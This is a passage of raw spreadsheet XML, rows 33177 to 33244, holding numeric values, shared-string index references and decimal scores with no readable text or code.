      </c>
      <c r="E33177" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33177" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33178" ht="15.75" customHeight="1">
      <c r="A33178" s="1">
        <v>10275.0</v>
      </c>
      <c r="B33178" s="2">
        <v>5.7623868E7</v>
      </c>
      <c r="C33178" s="2" t="s">
        <v>31937</v>
      </c>
      <c r="D33178" s="2">
        <v>1.0</v>
      </c>
      <c r="E33178" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33178" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33179" ht="15.75" customHeight="1">
      <c r="A33179" s="1">
        <v>10305.0</v>
      </c>
      <c r="B33179" s="2">
        <v>5.7669396E7</v>
      </c>
      <c r="C33179" s="2" t="s">
        <v>31938</v>
      </c>
      <c r="D33179" s="2">
        <v>1.0</v>
      </c>
      <c r="E33179" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33179" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33180" ht="15.75" customHeight="1">
      <c r="A33180" s="1">
        <v>10507.0</v>
      </c>
      <c r="B33180" s="2">
        <v>1.1435453E7</v>
      </c>
      <c r="C33180" s="2" t="s">
        <v>31939</v>
      </c>
      <c r="D33180" s="2">
        <v>1.0</v>
      </c>
      <c r="E33180" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33180" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33181" ht="15.75" customHeight="1">
      <c r="A33181" s="1">
        <v>10720.0</v>
      </c>
      <c r="B33181" s="2">
        <v>1.512676E7</v>
      </c>
      <c r="C33181" s="2" t="s">
        <v>31940</v>
      </c>
      <c r="D33181" s="2">
        <v>1.0</v>
      </c>
      <c r="E33181" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33181" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33182" ht="15.75" customHeight="1">
      <c r="A33182" s="1">
        <v>11735.0</v>
      </c>
      <c r="B33182" s="2">
        <v>2.4048326E7</v>
      </c>
      <c r="C33182" s="2" t="s">
        <v>31941</v>
      </c>
      <c r="D33182" s="2">
        <v>1.0</v>
      </c>
      <c r="E33182" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33182" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33183" ht="15.75" customHeight="1">
      <c r="A33183" s="1">
        <v>12720.0</v>
      </c>
      <c r="B33183" s="2">
        <v>3.087214E7</v>
      </c>
      <c r="C33183" s="2" t="s">
        <v>31942</v>
      </c>
      <c r="D33183" s="2">
        <v>1.0</v>
      </c>
      <c r="E33183" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33183" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33184" ht="15.75" customHeight="1">
      <c r="A33184" s="1">
        <v>13536.0</v>
      </c>
      <c r="B33184" s="2">
        <v>3.5600933E7</v>
      </c>
      <c r="C33184" s="2" t="s">
        <v>31943</v>
      </c>
      <c r="D33184" s="2">
        <v>1.0</v>
      </c>
      <c r="E33184" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33184" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33185" ht="15.75" customHeight="1">
      <c r="A33185" s="1">
        <v>13714.0</v>
      </c>
      <c r="B33185" s="2">
        <v>3.6252838E7</v>
      </c>
      <c r="C33185" s="2" t="s">
        <v>31944</v>
      </c>
      <c r="D33185" s="2">
        <v>1.0</v>
      </c>
      <c r="E33185" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33185" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33186" ht="15.75" customHeight="1">
      <c r="A33186" s="1">
        <v>13964.0</v>
      </c>
      <c r="B33186" s="2">
        <v>3.7312502E7</v>
      </c>
      <c r="C33186" s="2" t="s">
        <v>31945</v>
      </c>
      <c r="D33186" s="2">
        <v>1.0</v>
      </c>
      <c r="E33186" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33186" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33187" ht="15.75" customHeight="1">
      <c r="A33187" s="1">
        <v>14387.0</v>
      </c>
      <c r="B33187" s="2">
        <v>3.9058435E7</v>
      </c>
      <c r="C33187" s="2" t="s">
        <v>31946</v>
      </c>
      <c r="D33187" s="2">
        <v>1.0</v>
      </c>
      <c r="E33187" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33187" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33188" ht="15.75" customHeight="1">
      <c r="A33188" s="1">
        <v>14420.0</v>
      </c>
      <c r="B33188" s="2">
        <v>3.9248136E7</v>
      </c>
      <c r="C33188" s="2" t="s">
        <v>31947</v>
      </c>
      <c r="D33188" s="2">
        <v>1.0</v>
      </c>
      <c r="E33188" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33188" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33189" ht="15.75" customHeight="1">
      <c r="A33189" s="1">
        <v>14876.0</v>
      </c>
      <c r="B33189" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C33189" s="2" t="s">
        <v>31948</v>
      </c>
      <c r="D33189" s="2">
        <v>1.0</v>
      </c>
      <c r="E33189" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33189" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33190" ht="15.75" customHeight="1">
      <c r="A33190" s="1">
        <v>16473.0</v>
      </c>
      <c r="B33190" s="2">
        <v>4.6504548E7</v>
      </c>
      <c r="C33190" s="2" t="s">
        <v>31949</v>
      </c>
      <c r="D33190" s="2">
        <v>1.0</v>
      </c>
      <c r="E33190" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33190" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33191" ht="15.75" customHeight="1">
      <c r="A33191" s="1">
        <v>17225.0</v>
      </c>
      <c r="B33191" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C33191" s="2" t="s">
        <v>31950</v>
      </c>
      <c r="D33191" s="2">
        <v>1.0</v>
      </c>
      <c r="E33191" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33191" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33192" ht="15.75" customHeight="1">
      <c r="A33192" s="1">
        <v>17441.0</v>
      </c>
      <c r="B33192" s="2">
        <v>4.9765021E7</v>
      </c>
      <c r="C33192" s="2" t="s">
        <v>31951</v>
      </c>
      <c r="D33192" s="2">
        <v>1.0</v>
      </c>
      <c r="E33192" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33192" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33193" ht="15.75" customHeight="1">
      <c r="A33193" s="1">
        <v>17603.0</v>
      </c>
      <c r="B33193" s="2">
        <v>5.0354654E7</v>
      </c>
      <c r="C33193" s="2" t="s">
        <v>31952</v>
      </c>
      <c r="D33193" s="2">
        <v>1.0</v>
      </c>
      <c r="E33193" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33193" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33194" ht="15.75" customHeight="1">
      <c r="A33194" s="1">
        <v>17650.0</v>
      </c>
      <c r="B33194" s="2">
        <v>5.0419409E7</v>
      </c>
      <c r="C33194" s="2" t="s">
        <v>31953</v>
      </c>
      <c r="D33194" s="2">
        <v>1.0</v>
      </c>
      <c r="E33194" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33194" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33195" ht="15.75" customHeight="1">
      <c r="A33195" s="1">
        <v>18061.0</v>
      </c>
      <c r="B33195" s="2">
        <v>5.1602586E7</v>
      </c>
      <c r="C33195" s="2" t="s">
        <v>31954</v>
      </c>
      <c r="D33195" s="2">
        <v>1.0</v>
      </c>
      <c r="E33195" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33195" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33196" ht="15.75" customHeight="1">
      <c r="A33196" s="1">
        <v>18093.0</v>
      </c>
      <c r="B33196" s="2">
        <v>5.168944E7</v>
      </c>
      <c r="C33196" s="2" t="s">
        <v>31955</v>
      </c>
      <c r="D33196" s="2">
        <v>1.0</v>
      </c>
      <c r="E33196" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33196" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33197" ht="15.75" customHeight="1">
      <c r="A33197" s="1">
        <v>18158.0</v>
      </c>
      <c r="B33197" s="2">
        <v>5.1888881E7</v>
      </c>
      <c r="C33197" s="2" t="s">
        <v>31956</v>
      </c>
      <c r="D33197" s="2">
        <v>1.0</v>
      </c>
      <c r="E33197" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33197" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33198" ht="15.75" customHeight="1">
      <c r="A33198" s="1">
        <v>18769.0</v>
      </c>
      <c r="B33198" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C33198" s="2" t="s">
        <v>31957</v>
      </c>
      <c r="D33198" s="2">
        <v>1.0</v>
      </c>
      <c r="E33198" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33198" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33199" ht="15.75" customHeight="1">
      <c r="A33199" s="1">
        <v>18947.0</v>
      </c>
      <c r="B33199" s="2">
        <v>5.4345333E7</v>
      </c>
      <c r="C33199" s="2" t="s">
        <v>31958</v>
      </c>
      <c r="D33199" s="2">
        <v>1.0</v>
      </c>
      <c r="E33199" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33199" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33200" ht="15.75" customHeight="1">
      <c r="A33200" s="1">
        <v>19635.0</v>
      </c>
      <c r="B33200" s="2">
        <v>5.6281543E7</v>
      </c>
      <c r="C33200" s="2" t="s">
        <v>31959</v>
      </c>
      <c r="D33200" s="2">
        <v>1.0</v>
      </c>
      <c r="E33200" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33200" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33201" ht="15.75" customHeight="1">
      <c r="A33201" s="1">
        <v>20090.0</v>
      </c>
      <c r="B33201" s="2">
        <v>9457561.0</v>
      </c>
      <c r="C33201" s="2" t="s">
        <v>31960</v>
      </c>
      <c r="D33201" s="2">
        <v>1.0</v>
      </c>
      <c r="E33201" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33201" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33202" ht="15.75" customHeight="1">
      <c r="A33202" s="1">
        <v>20219.0</v>
      </c>
      <c r="B33202" s="2">
        <v>1.0740252E7</v>
      </c>
      <c r="C33202" s="2" t="s">
        <v>31961</v>
      </c>
      <c r="D33202" s="2">
        <v>1.0</v>
      </c>
      <c r="E33202" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33202" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33203" ht="15.75" customHeight="1">
      <c r="A33203" s="1">
        <v>20561.0</v>
      </c>
      <c r="B33203" s="2">
        <v>1.3409296E7</v>
      </c>
      <c r="C33203" s="2" t="s">
        <v>31870</v>
      </c>
      <c r="D33203" s="2">
        <v>1.0</v>
      </c>
      <c r="E33203" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33203" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33204" ht="15.75" customHeight="1">
      <c r="A33204" s="1">
        <v>21082.0</v>
      </c>
      <c r="B33204" s="2">
        <v>1.8041195E7</v>
      </c>
      <c r="C33204" s="2" t="s">
        <v>31962</v>
      </c>
      <c r="D33204" s="2">
        <v>1.0</v>
      </c>
      <c r="E33204" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33204" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33205" ht="15.75" customHeight="1">
      <c r="A33205" s="1">
        <v>22991.0</v>
      </c>
      <c r="B33205" s="2">
        <v>4942566.0</v>
      </c>
      <c r="C33205" s="2" t="s">
        <v>31963</v>
      </c>
      <c r="D33205" s="2">
        <v>1.0</v>
      </c>
      <c r="E33205" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33205" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33206" ht="15.75" customHeight="1">
      <c r="A33206" s="1">
        <v>23009.0</v>
      </c>
      <c r="B33206" s="2">
        <v>4.9807414E7</v>
      </c>
      <c r="C33206" s="2" t="s">
        <v>31964</v>
      </c>
      <c r="D33206" s="2">
        <v>1.0</v>
      </c>
      <c r="E33206" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33206" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33207" ht="15.75" customHeight="1">
      <c r="A33207" s="1">
        <v>23090.0</v>
      </c>
      <c r="B33207" s="2">
        <v>5.0692639E7</v>
      </c>
      <c r="C33207" s="2" t="s">
        <v>31965</v>
      </c>
      <c r="D33207" s="2">
        <v>1.0</v>
      </c>
      <c r="E33207" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33207" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33208" ht="15.75" customHeight="1">
      <c r="A33208" s="1">
        <v>24365.0</v>
      </c>
      <c r="B33208" s="2">
        <v>1.0740251E7</v>
      </c>
      <c r="C33208" s="2" t="s">
        <v>31961</v>
      </c>
      <c r="D33208" s="2">
        <v>1.0</v>
      </c>
      <c r="E33208" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33208" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33209" ht="15.75" customHeight="1">
      <c r="A33209" s="1">
        <v>24688.0</v>
      </c>
      <c r="B33209" s="2">
        <v>1.162116E7</v>
      </c>
      <c r="C33209" s="2" t="s">
        <v>31966</v>
      </c>
      <c r="D33209" s="2">
        <v>1.0</v>
      </c>
      <c r="E33209" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33209" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33210" ht="15.75" customHeight="1">
      <c r="A33210" s="1">
        <v>25024.0</v>
      </c>
      <c r="B33210" s="2">
        <v>1.2807102E7</v>
      </c>
      <c r="C33210" s="2" t="s">
        <v>31967</v>
      </c>
      <c r="D33210" s="2">
        <v>1.0</v>
      </c>
      <c r="E33210" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33210" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33211" ht="15.75" customHeight="1">
      <c r="A33211" s="1">
        <v>25047.0</v>
      </c>
      <c r="B33211" s="2">
        <v>1.2845803E7</v>
      </c>
      <c r="C33211" s="2" t="s">
        <v>31968</v>
      </c>
      <c r="D33211" s="2">
        <v>1.0</v>
      </c>
      <c r="E33211" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33211" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33212" ht="15.75" customHeight="1">
      <c r="A33212" s="1">
        <v>25900.0</v>
      </c>
      <c r="B33212" s="2">
        <v>1.5040833E7</v>
      </c>
      <c r="C33212" s="2" t="s">
        <v>31969</v>
      </c>
      <c r="D33212" s="2">
        <v>1.0</v>
      </c>
      <c r="E33212" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33212" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33213" ht="15.75" customHeight="1">
      <c r="A33213" s="1">
        <v>29174.0</v>
      </c>
      <c r="B33213" s="2">
        <v>3.0708875E7</v>
      </c>
      <c r="C33213" s="2" t="s">
        <v>31970</v>
      </c>
      <c r="D33213" s="2">
        <v>1.0</v>
      </c>
      <c r="E33213" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33213" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33214" ht="15.75" customHeight="1">
      <c r="A33214" s="1">
        <v>30954.0</v>
      </c>
      <c r="B33214" s="2">
        <v>4.7379468E7</v>
      </c>
      <c r="C33214" s="2" t="s">
        <v>31971</v>
      </c>
      <c r="D33214" s="2">
        <v>1.0</v>
      </c>
      <c r="E33214" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33214" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33215" ht="15.75" customHeight="1">
      <c r="A33215" s="1">
        <v>32190.0</v>
      </c>
      <c r="B33215" s="2">
        <v>5474638.0</v>
      </c>
      <c r="C33215" s="2" t="s">
        <v>31972</v>
      </c>
      <c r="D33215" s="2">
        <v>1.0</v>
      </c>
      <c r="E33215" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33215" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33216" ht="15.75" customHeight="1">
      <c r="A33216" s="1">
        <v>33657.0</v>
      </c>
      <c r="B33216" s="2">
        <v>8402613.0</v>
      </c>
      <c r="C33216" s="2" t="s">
        <v>7015</v>
      </c>
      <c r="D33216" s="2">
        <v>1.0</v>
      </c>
      <c r="E33216" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33216" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33217" ht="15.75" customHeight="1">
      <c r="A33217" s="1">
        <v>33689.0</v>
      </c>
      <c r="B33217" s="2">
        <v>8455623.0</v>
      </c>
      <c r="C33217" s="2" t="s">
        <v>31973</v>
      </c>
      <c r="D33217" s="2">
        <v>1.0</v>
      </c>
      <c r="E33217" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33217" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33218" ht="15.75" customHeight="1">
      <c r="A33218" s="1">
        <v>34067.0</v>
      </c>
      <c r="B33218" s="2">
        <v>9638349.0</v>
      </c>
      <c r="C33218" s="2" t="s">
        <v>31974</v>
      </c>
      <c r="D33218" s="2">
        <v>1.0</v>
      </c>
      <c r="E33218" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33218" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33219" ht="15.75" customHeight="1">
      <c r="A33219" s="1">
        <v>6636.0</v>
      </c>
      <c r="B33219" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C33219" s="2" t="s">
        <v>31975</v>
      </c>
      <c r="D33219" s="2">
        <v>1.0</v>
      </c>
      <c r="E33219" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33219" s="2">
        <v>0.09567901234567898</v>
      </c>
    </row>
    <row r="33220" ht="15.75" customHeight="1">
      <c r="A33220" s="1">
        <v>6093.0</v>
      </c>
      <c r="B33220" s="2">
        <v>4.7702584E7</v>
      </c>
      <c r="C33220" s="2" t="s">
        <v>31976</v>
      </c>
      <c r="D33220" s="2">
        <v>1.0</v>
      </c>
      <c r="E33220" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33220" s="2">
        <v>0.09538784067085955</v>
      </c>
    </row>
    <row r="33221" ht="15.75" customHeight="1">
      <c r="A33221" s="1">
        <v>19017.0</v>
      </c>
      <c r="B33221" s="2">
        <v>5.4525015E7</v>
      </c>
      <c r="C33221" s="2" t="s">
        <v>31977</v>
      </c>
      <c r="D33221" s="2">
        <v>1.0</v>
      </c>
      <c r="E33221" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33221" s="2">
        <v>0.09538784067085955</v>
      </c>
    </row>
    <row r="33222" ht="15.75" customHeight="1">
      <c r="A33222" s="1">
        <v>31550.0</v>
      </c>
      <c r="B33222" s="2">
        <v>5114526.0</v>
      </c>
      <c r="C33222" s="2" t="s">
        <v>31978</v>
      </c>
      <c r="D33222" s="2">
        <v>1.0</v>
      </c>
      <c r="E33222" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33222" s="2">
        <v>0.09482758620689655</v>
      </c>
    </row>
    <row r="33223" ht="15.75" customHeight="1">
      <c r="A33223" s="1">
        <v>14577.0</v>
      </c>
      <c r="B33223" s="2">
        <v>4.0098431E7</v>
      </c>
      <c r="C33223" s="2" t="s">
        <v>31979</v>
      </c>
      <c r="D33223" s="2">
        <v>1.0</v>
      </c>
      <c r="E33223" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33223" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="33224" ht="15.75" customHeight="1">
      <c r="A33224" s="1">
        <v>27212.0</v>
      </c>
      <c r="B33224" s="2">
        <v>2.0966486E7</v>
      </c>
      <c r="C33224" s="2" t="s">
        <v>31980</v>
      </c>
      <c r="D33224" s="2">
        <v>1.0</v>
      </c>
      <c r="E33224" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33224" s="2">
        <v>0.09454191033138402</v>
      </c>
    </row>
    <row r="33225" ht="15.75" customHeight="1">
      <c r="A33225" s="1">
        <v>12952.0</v>
      </c>
      <c r="B33225" s="2">
        <v>3.2391694E7</v>
      </c>
      <c r="C33225" s="2" t="s">
        <v>31981</v>
      </c>
      <c r="D33225" s="2">
        <v>1.0</v>
      </c>
      <c r="E33225" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33225" s="2">
        <v>0.09454191033138401</v>
      </c>
    </row>
    <row r="33226" ht="15.75" customHeight="1">
      <c r="A33226" s="1">
        <v>27433.0</v>
      </c>
      <c r="B33226" s="2">
        <v>2.1920157E7</v>
      </c>
      <c r="C33226" s="2" t="s">
        <v>31982</v>
      </c>
      <c r="D33226" s="2">
        <v>1.0</v>
      </c>
      <c r="E33226" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33226" s="2">
        <v>0.09454191033138401</v>
      </c>
    </row>
    <row r="33227" ht="15.75" customHeight="1">
      <c r="A33227" s="1">
        <v>11236.0</v>
      </c>
      <c r="B33227" s="2">
        <v>2.039167E7</v>
      </c>
      <c r="C33227" s="2" t="s">
        <v>31983</v>
      </c>
      <c r="D33227" s="2">
        <v>1.0</v>
      </c>
      <c r="E33227" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33227" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="33228" ht="15.75" customHeight="1">
      <c r="A33228" s="1">
        <v>4439.0</v>
      </c>
      <c r="B33228" s="2">
        <v>4.2361277E7</v>
      </c>
      <c r="C33228" s="2" t="s">
        <v>31984</v>
      </c>
      <c r="D33228" s="2">
        <v>1.0</v>
      </c>
      <c r="E33228" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33228" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="33229" ht="15.75" customHeight="1">
      <c r="A33229" s="1">
        <v>13577.0</v>
      </c>
      <c r="B33229" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C33229" s="2" t="s">
        <v>31985</v>
      </c>
      <c r="D33229" s="2">
        <v>1.0</v>
      </c>
      <c r="E33229" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33229" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="33230" ht="15.75" customHeight="1">
      <c r="A33230" s="1">
        <v>21608.0</v>
      </c>
      <c r="B33230" s="2">
        <v>2.4373822E7</v>
      </c>
      <c r="C33230" s="2" t="s">
        <v>31986</v>
      </c>
      <c r="D33230" s="2">
        <v>1.0</v>
      </c>
      <c r="E33230" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33230" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="33231" ht="15.75" customHeight="1">
      <c r="A33231" s="1">
        <v>251.0</v>
      </c>
      <c r="B33231" s="2">
        <v>1.5036726E7</v>
      </c>
      <c r="C33231" s="2" t="s">
        <v>31987</v>
      </c>
      <c r="D33231" s="2">
        <v>1.0</v>
      </c>
      <c r="E33231" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33231" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33232" ht="15.75" customHeight="1">
      <c r="A33232" s="1">
        <v>8970.0</v>
      </c>
      <c r="B33232" s="2">
        <v>5.495383E7</v>
      </c>
      <c r="C33232" s="2" t="s">
        <v>31988</v>
      </c>
      <c r="D33232" s="2">
        <v>1.0</v>
      </c>
      <c r="E33232" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33232" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33233" ht="15.75" customHeight="1">
      <c r="A33233" s="1">
        <v>13234.0</v>
      </c>
      <c r="B33233" s="2">
        <v>3.4251343E7</v>
      </c>
      <c r="C33233" s="2" t="s">
        <v>31989</v>
      </c>
      <c r="D33233" s="2">
        <v>1.0</v>
      </c>
      <c r="E33233" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33233" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33234" ht="15.75" customHeight="1">
      <c r="A33234" s="1">
        <v>16950.0</v>
      </c>
      <c r="B33234" s="2">
        <v>4.8234752E7</v>
      </c>
      <c r="C33234" s="2" t="s">
        <v>31990</v>
      </c>
      <c r="D33234" s="2">
        <v>1.0</v>
      </c>
      <c r="E33234" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33234" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33235" ht="15.75" customHeight="1">
      <c r="A33235" s="1">
        <v>16991.0</v>
      </c>
      <c r="B33235" s="2">
        <v>4.8368796E7</v>
      </c>
      <c r="C33235" s="2" t="s">
        <v>31991</v>
      </c>
      <c r="D33235" s="2">
        <v>1.0</v>
      </c>
      <c r="E33235" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33235" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33236" ht="15.75" customHeight="1">
      <c r="A33236" s="1">
        <v>24643.0</v>
      </c>
      <c r="B33236" s="2">
        <v>1.1484223E7</v>
      </c>
      <c r="C33236" s="2" t="s">
        <v>31992</v>
      </c>
      <c r="D33236" s="2">
        <v>1.0</v>
      </c>
      <c r="E33236" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33236" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33237" ht="15.75" customHeight="1">
      <c r="A33237" s="1">
        <v>25589.0</v>
      </c>
      <c r="B33237" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C33237" s="2" t="s">
        <v>31993</v>
      </c>
      <c r="D33237" s="2">
        <v>1.0</v>
      </c>
      <c r="E33237" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33237" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33238" ht="15.75" customHeight="1">
      <c r="A33238" s="1">
        <v>27342.0</v>
      </c>
      <c r="B33238" s="2">
        <v>2.1456103E7</v>
      </c>
      <c r="C33238" s="2" t="s">
        <v>31994</v>
      </c>
      <c r="D33238" s="2">
        <v>1.0</v>
      </c>
      <c r="E33238" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33238" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33239" ht="15.75" customHeight="1">
      <c r="A33239" s="1">
        <v>30347.0</v>
      </c>
      <c r="B33239" s="2">
        <v>3.822138E7</v>
      </c>
      <c r="C33239" s="2" t="s">
        <v>31995</v>
      </c>
      <c r="D33239" s="2">
        <v>1.0</v>
      </c>
      <c r="E33239" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33239" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33240" ht="15.75" customHeight="1">
      <c r="A33240" s="1">
        <v>33972.0</v>
      </c>
      <c r="B33240" s="2">
        <v>9386004.0</v>
      </c>
      <c r="C33240" s="2" t="s">
        <v>31996</v>
      </c>
      <c r="D33240" s="2">
        <v>1.0</v>
      </c>
      <c r="E33240" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33240" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="33241" ht="15.75" customHeight="1">
      <c r="A33241" s="1">
        <v>741.0</v>
      </c>
      <c r="B33241" s="2">
        <v>2.0874681E7</v>
      </c>
      <c r="C33241" s="2" t="s">
        <v>31997</v>
      </c>
      <c r="D33241" s="2">
        <v>1.0</v>
      </c>
      <c r="E33241" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33241" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33242" ht="15.75" customHeight="1">
      <c r="A33242" s="1">
        <v>797.0</v>
      </c>
      <c r="B33242" s="2">
        <v>2.1228484E7</v>
      </c>
      <c r="C33242" s="2" t="s">
        <v>31998</v>
      </c>
      <c r="D33242" s="2">
        <v>1.0</v>
      </c>
      <c r="E33242" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33242" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33243" ht="15.75" customHeight="1">
      <c r="A33243" s="1">
        <v>957.0</v>
      </c>
      <c r="B33243" s="2">
        <v>2.2656269E7</v>
      </c>
      <c r="C33243" s="2" t="s">
        <v>31999</v>
      </c>
      <c r="D33243" s="2">
        <v>1.0</v>
      </c>
      <c r="E33243" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33243" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33244" ht="15.75" customHeight="1">
      <c r="A33244" s="1">
        <v>2445.0</v>
      </c>
      <c r="B33244" s="2">
        <v>3.3705038E7</v>
      </c>
      <c r="C33244" s="2" t="s">
        <v>32000</v>
      </c>
      <c r="D33244" s="2">
        <v>1.0</v>
      </c>
      <c r="E33244" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33244" s="2">
